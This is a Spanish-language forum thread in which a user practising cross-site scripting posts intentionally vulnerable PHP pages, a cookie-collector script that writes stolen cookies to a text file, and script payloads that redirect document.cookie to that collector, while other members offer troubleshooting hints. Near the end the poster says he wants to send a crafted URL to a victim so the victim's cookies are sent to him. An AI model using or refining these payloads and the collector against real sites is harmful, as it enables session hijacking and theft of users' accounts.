Hola gente del foro, estaba en casa intentando practicar xss leyendo tutoriales, pero no me sale :S
miren hize unas paginas vulnerables, pero me sigue sin salir:
pagina: pindex.php
<?php
if(isset($_COOKIE['user'])) echo $_COOKIE['user'];
?>
<html>
<head>
</head>
<body>
<form method="post" action="buscador.php">
<input type="text" name="palabrita">
<br>
<input type="submit" value="enviar"></form>
</body>
</html>
buscador.php
<?php
$user = $_REQUEST['palabrita'];
setcookie("user", $user, time()+(60*60*24*365),"/");
?>
<html>
<head></head>
<body>
<a href="indexxx.php"> Pagina 1</a>
</body>
</html>
cookies.php
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, $cookie);
fclose($fff);
?>
y esta es la url que mando:
http://localhost/buscador.php?palabrita=
<script>window.location='http://localhost/cookies.php?cookie='+document.cookie;</script>&enviar=;
el problema es que no me crea el archivo archivo.txt :S
alguien sabe a que se debe.. ? gracias
aprende php, lo unico vulnerable es el pindex.php
es que no se que estoy haciendo mal -.-"
No es necesario enviar el valor como una Cookie...
Puede ser que el servidor tenga la directiva magic_quotes_gpc On y te escape las comillas simples y dobles de los valores que se envian via Get, Post o Cookie...
Prueba con este
<?php
if(isset($_POST['palabrita'])){
setcookie("user", $_POST['palabrita']);
}
if(isset($_COOKIE['user'])){
echo $_COOKIE['user'];
exit;
}
?>
<html>
<head>
</head>
<body>
<form method="post">
<input type="text" name="palabrita">
<br>
<input type="submit" value="enviar"></form>
</body>
</html>
sigue sin salirme, sinceramente no se que estoy haciendo mal :S :-[
Que nevegador utilizas? Algunos como IE8 tienen protecciones anti XSS que no permiten acceder directamente a la variable document.cookie
sisi :) utilizo mozilla 3.6 miren me quede toda la noche ayer y logre obtener una fucking cookie..
les dejo los codigos :)
<?php
if(isset($_COOKIE['user'])) echo $_COOKIE['user'];
?>
<html>
<head>
</head>
<body>
<form method="post" action="buscador.php">
<input name="palabrita" type="text">
<br>
<input type="submit" value="enviar"></form>
<a
onclick="document.location='http://localhost/lalsa.php?cookie='+escape(document.cookie);" href="#"> Click here for details</a>
</body>
</html>
buscador.php
<?php
$user = $_REQUEST['palabrita'];
setcookie("user", $user, time()+(60*60*24*365),"/");
echo $user;
?>
<html>
<head></head>
<body>
<a href="pindex.php"> Pagina 1</a>
lasla.php
<?php
$cookie = $_GET['cookie'];
$archivo ="datos.txt";
$f = fopen($archivo,"w");
fputs($f, $cookie);
fclose ($f);
?>
el problema es el siguiente, yo quiero mandar una url a la victima y que sus cookies de esa pagina vulnerable se envien a mi, pero no se que url "maliciosa" mandar... me entienden ?
ya que si mando estO:
<script><a
onclick="document.location='http://localhost/lalsa.php?cookie='+escape(document.cookie);" href="#"> Volver a la pagina</a></script>
me guarda en la cookie lo siguiente:
token=8c610b4ae58115e366123efd8e7b7accd7ba525a2207acc6; u=fra; c=a1305ca10f94f2340770c73e26d427588f236709; user=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Flocalhost%2Flalsa.php%3Fcookie%3D%27 escape%28document.cookie%29%3B%3C%2Fscript%3E;
y ahi no me esta guardando ningun usuario solo lo que puse acontinuacion de la variable palabrita :s
muchas gracias